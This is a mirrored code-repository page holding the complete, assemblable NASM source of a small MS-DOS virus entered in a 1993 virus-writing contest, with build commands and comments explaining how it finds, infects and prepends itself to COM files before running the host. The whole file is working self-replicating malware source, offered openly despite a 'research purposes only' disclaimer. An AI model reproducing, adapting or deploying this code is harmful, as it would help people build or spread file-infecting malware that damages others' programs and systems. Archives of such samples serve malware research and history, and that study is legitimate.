Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-25 16:38:38 +00:00
Code Releases Activity
main
vxug-MalwareSourceCode/MSDOS/L-Index/Virus.MSDOS.Unknown.little.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

153 lines
7.0 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;A small (139 byte) virus with minimal required functionality.
;This Virus for research purposes only. Please do not release!
;Please execute it only on a carefully controlled system, and only
;if you know what you're doing!
;An example for
;#######################################################
;# THE FIRST INTERNATIONAL VIRUS WRITING CONTEST #
;# 1 9 9 3 #
;# sponsored by #
;# American Eagle Publications, Inc. #
;#######################################################
;Assemble this file with TASM 2.0 or higher: "TASM LITTLE;"
;Link as "TLINK /T LITTLE;"
;Basic explanation of how this virus works:
;
;The virus takes control when the program first starts up. All of its code is
;originally located at the start of a COM file that has been infected. When
;the virus starts, it takes over a segment 64K above the one where the program
;was loaded by DOS. It copies itself up there, and then searches for an
;uninfected file. To determine if a file is infected, it checks the first two
;bytes to see if they are the same as its first two bytes. It reads the file
;into memory right above where it is sitting (at 100H in the upper segment).
;If not already infected, it just writes itself plus the file it infected back
;out to disk under the same file name. Then it moves the host in the lower
;segment back to offset 100H and executes it.
.model tiny ;Tiny model to create a COM file
.code
;DTA definitions
DTA EQU 0000H ;Disk transfer area
FSIZE EQU DTA+1AH ;file size location in file search
FNAME EQU DTA+1EH ;file name location in file search
ORG 100H
;******************************************************************************
;The virus starts here.
VIRSTART:
mov ax,ds
add ax,1000H
mov es,ax ;upper segment is this one + 1000H
mov si,100H ;put virus in the upper segment
mov di,si ;at offset 100H
; mov cl,BYTE (OFFSET HOST AND 0FFH) ;can't code this with TASM
mov cl,8BH ;we can assume ch=0
rep movsb ;this will louse the infection up if run under debug!
mov ds,ax ;set ds to high segment
push ds
mov ax,OFFSET FIND_FILE
push ax
retf ;jump to high memory segment
;Now it's time to find a viable file to infect. We will look for any COM file
;and see if the virus is there already.
FIND_FILE:
xor dx,dx ;move dta to high segment
mov ah,1AH ;so we don't trash the command line
int 21H ;which the host is expecting
mov dx,OFFSET COMFILE
mov ch,3FH ;search for any file, no matter what attribute (note: cx=0 before this instr)
mov ah,4EH ;DOS search first function
int 21H
CHECK_FILE: jc ALLDONE ;no COM files to infect
mov dx,FNAME ;first open the file
mov ax,3D02H ;r/w access open file, since we'll want to write to it
int 21H
jc NEXT_FILE ;error opening file - quit and say this file can't be used
mov bx,ax ;put file handle in bx, and leave it there for the duration
mov di,FSIZE
mov cx,[di] ;get file size for reading into buffer
mov dx,si ;and read file in at HOST in new segment (note si=OFFSET HOST)
mov ah,3FH ;DOS read function
int 21H
mov ax,[si] ;si=OFFSET HOST here
jc NEXT_FILE ;skip file if error reading it
cmp ax,WORD PTR [VIRSTART] ;see if infected already
jnz INFECT_FILE ;nope, go do it
mov ah,3EH ;else close the file
int 21H ;and fall through to search for another file
NEXT_FILE: mov ah,4FH ;look for another file
int 21H
jmp SHORT CHECK_FILE ;and go check it out
COMFILE DB '*.COM',0
;When we get here, we've opened a file successfully, and read it into memory.
;In the high segment, the file is set up exactly as it will look when infected.
;Thus, to infect, we just rewrite the file from the start, using the image
;in the high segment.
INFECT_FILE:
xor cx,cx
mov dx,cx ;reset file pointer to start of file
mov ax,4200H
int 21H
mov ah,40H
mov dx,100H
mov cx,WORD PTR [di] ;adjust size of file for infection
add cx,OFFSET HOST - 100H
int 21H ;write infected file
mov ah,3EH ;close the file
int 21H
;The infection process is now complete. This routine moves the host program
;down so that its code starts at offset 100H, and then transfers control to it.
ALLDONE:
mov ax,ss ;set ds, es to low segment again
mov ds,ax
mov es,ax
push ax ;prep for retf to host
shr dx,1 ;restore dta to original value
mov ah,1AH ;for compatibility
int 21H
mov di,100H ;prep to move host back to original location
push di
; mov cx,sp ;move code, but don't trash the stack
; sub cx,si
mov cx,0FE6FH ;hand code the above to save a byte
rep movsb ;move code
retf ;and return to host
;******************************************************************************
;The host program starts here. This one is a dummy that just returns control
;to DOS.
HOST:
mov ax,4C00H ;Terminate, error code = 0
int 21H
HOST_END:
END VIRSTART

View Git Blame Copy Permalink